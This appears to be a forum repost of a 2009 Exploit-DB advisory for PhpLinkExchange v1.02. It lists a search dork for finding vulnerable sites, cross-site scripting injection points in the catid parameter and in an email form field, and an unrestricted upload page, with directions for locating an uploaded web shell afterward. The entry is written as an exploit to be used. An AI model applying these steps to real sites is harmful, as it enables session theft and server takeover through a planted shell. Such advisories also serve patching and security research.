- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10495
- Проверка EDB
-
- Пройдено
- Автор
- STINK'
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3679
- Дата публикации
- 2009-12-16
Код:
#############################
PhpLinkExchange v1.02 - XSS/Upload Vulerability
Discovered by : Stink'
Date : 2009-12-16
Dork : "PhpLinkExchange v1.02"
Website Publisher : http://www.idevspot.com/PhpLinkExchange.php
#############################
-- [XSS in URL] --
http://server/links/PhpLinkExchange/index.php?page=home&catid=[XSS]
-- [XSS in form] --
http://server/links/PhpLinkExchange/index.php?page=tellafriend
The XSS is in "Your Email Adress"
-- [Upload Vulnerability] --
http://server/links/library/add_images.php
After your shell uploaded, go here :
http://server/links/appimage/ and search your shell :)- Источник
- www.exploit-db.com
